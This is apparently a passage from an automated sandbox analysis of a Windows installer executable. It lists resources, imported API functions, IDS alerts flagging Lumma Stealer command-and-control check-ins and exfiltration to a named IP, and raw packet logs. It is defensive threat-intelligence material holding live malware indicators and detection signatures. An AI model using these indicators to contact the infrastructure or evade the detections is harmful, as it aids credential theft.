                                                                                                RT_RCDATA0x3433a80x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                RT_GROUP_CURSOR0x345e740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                RT_GROUP_CURSOR0x345e880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                RT_GROUP_CURSOR0x345e9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x345eb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x345ec40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x345ed80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_CURSOR0x345eec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                RT_GROUP_ICON0x345f000x5adataEnglishUnited States0.7666666666666667
                                                                                                RT_VERSION0x345f5c0x514dataEnglishUnited States0.2923076923076923
                                                                                                RT_MANIFEST0x3464700x726XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4005464480874317

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                                comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                                shell32.dllSHBrowseForFolderW, ExtractIconW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                                user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
                                                                                                version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                                advapi32.dllRegSetValueExW, RegEnumKeyExW, AdjustTokenPrivileges, OpenThreadToken, GetUserNameW, RegDeleteKeyW, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryInfoKeyW, AllocateAndInitializeSid, FreeSid, EqualSid, RegDeleteValueW, RegFlushKey, RegQueryValueExW, RegEnumValueW, GetTokenInformation, InitializeSecurityDescriptor, RegCloseKey, RegCreateKeyExW, SetSecurityDescriptorDacl
                                                                                                netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                msvcrt.dllmemcpy
                                                                                                winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                                                                kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                                                                                                gdi32.dllArc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries

                                                                                                Exports

                                                                                                NameOrdinalAddress
                                                                                                TMethodImplementationIntercept30x4b5e58
                                                                                                __dbk_fcall_wrapper20x410a7c
                                                                                                dbkFCallWrapperAddr10x6d1640

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2025-01-06T15:15:08.513880+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748188.114.97.3443TCP
                                                                                                2025-01-06T15:15:09.034284+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449748188.114.97.3443TCP
                                                                                                2025-01-06T15:15:09.034284+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748188.114.97.3443TCP
                                                                                                2025-01-06T15:15:09.515438+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749188.114.97.3443TCP
                                                                                                2025-01-06T15:15:10.005978+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449749188.114.97.3443TCP
                                                                                                2025-01-06T15:15:10.005978+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749188.114.97.3443TCP
                                                                                                2025-01-06T15:15:10.634900+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750188.114.97.3443TCP
                                                                                                2025-01-06T15:15:12.133029+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751188.114.97.3443TCP
                                                                                                2025-01-06T15:15:13.372746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752188.114.97.3443TCP
                                                                                                2025-01-06T15:15:14.676572+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753188.114.97.3443TCP
                                                                                                2025-01-06T15:15:15.492390+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449753188.114.97.3443TCP
                                                                                                2025-01-06T15:15:16.067101+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754188.114.97.3443TCP
                                                                                                2025-01-06T15:15:23.991606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756188.114.97.3443TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 6, 2025 15:15:08.020179987 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.020220995 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:08.020298004 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.023422956 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.023437023 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:08.513798952 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:08.513880014 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.518874884 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.518886089 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:08.519092083 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:08.569500923 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.612447023 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.612462044 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:08.612548113 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.034288883 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.034375906 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.034420013 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.035553932 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.035579920 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.035583019 CET49748443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.035590887 CET44349748188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.049983025 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.050019026 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.050080061 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.050659895 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.050669909 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.515362978 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.515438080 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.516659975 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.516668081 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.516877890 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:09.518053055 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.518070936 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:09.518110991 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.005987883 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006037951 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006069899 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006078959 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.006095886 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006133080 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.006145954 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006223917 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006258011 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.006263971 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006304979 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.006339073 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.006342888 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.010688066 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.010734081 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.010739088 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.010749102 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.010787010 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.010792017 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.010860920 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.010904074 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.011039019 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.011051893 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.011065006 CET49749443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.011069059 CET44349749188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.166177034 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.166224957 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.166306019 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.166547060 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.166563034 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.634809971 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.634900093 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.636125088 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.636136055 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.636337996 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.637468100 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.637609959 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.637640953 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:10.637695074 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:10.637702942 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:11.609323025 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:11.609400034 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:11.609451056 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:11.609596968 CET49750443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:11.609613895 CET44349750188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:11.672800064 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:11.672825098 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:11.672921896 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:11.673218012 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:11.673228979 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.132971048 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.133028984 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.134743929 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.134751081 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.134985924 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.136106014 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.136219025 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.136248112 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.633260012 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.633337975 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.633394957 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.633553028 CET49751443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.633563995 CET44349751188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.844772100 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.844805002 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:12.844887018 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.845179081 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:12.845191002 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.372643948 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.372745991 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:13.374186039 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:13.374212980 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.374452114 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.375705957 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:13.375832081 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:13.375869989 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.375948906 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:13.375958920 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.975513935 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.975634098 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:13.975703955 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:13.975871086 CET49752443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:13.975889921 CET44349752188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:14.220067978 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:14.220097065 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:14.220190048 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:14.220468044 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:14.220487118 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:14.676470995 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:14.676572084 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:14.677710056 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:14.677717924 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:14.677985907 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:14.679207087 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:14.679331064 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:14.679336071 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:15.492372990 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:15.492465019 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:15.492513895 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:15.492662907 CET49753443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:15.492681980 CET44349753188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:15.608513117 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:15.608556986 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:15.608629942 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:15.608980894 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:15.608994961 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:16.067020893 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:16.067101002 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:16.068257093 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:16.068286896 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:16.068545103 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:16.072427988 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:16.072583914 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:16.072596073 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:23.711513042 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:23.711594105 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:23.711684942 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:23.711826086 CET49754443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:23.711888075 CET44349754188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:23.782227039 CET49756443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:23.782255888 CET44349756188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:23.782335043 CET49756443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:23.782597065 CET49756443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:23.782610893 CET44349756188.114.97.3192.168.2.4
                                                                                                Jan 6, 2025 15:15:23.991605997 CET49756443192.168.2.4188.114.97.3
                                                                                                Jan 6, 2025 15:15:30.577831030 CET6224653192.168.2.4162.159.36.2
                                                                                                Jan 6, 2025 15:15:30.582811117 CET5362246162.159.36.2192.168.2.4
                                                                                                Jan 6, 2025 15:15:30.582895041 CET6224653192.168.2.4162.159.36.2
                                                                                                Jan 6, 2025 15:15:30.587732077 CET5362246162.159.36.2192.168.2.4
                                                                                                Jan 6, 2025 15:15:31.047470093 CET6224653192.168.2.4162.159.36.2
                                                                                                Jan 6, 2025 15:15:31.052500963 CET5362246162.159.36.2192.168.2.4
                                                                                                Jan 6, 2025 15:15:31.052557945 CET6224653192.168.2.4162.159.36.2

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 6, 2025 15:15:08.003470898 CET5897053192.168.2.41.1.1.1
                                                                                                Jan 6, 2025 15:15:08.015584946 CET53589701.1.1.1192.168.2.4
                                                                                                Jan 6, 2025 15:15:30.577321053 CET5354666162.159.36.2192.168.2.4
                                                                                                Jan 6, 2025 15:15:31.061511993 CET5320753192.168.2.41.1.1.1
                                                                                                Jan 6, 2025 15:15:31.070869923 CET53532071.1.1.1192.168.2.4

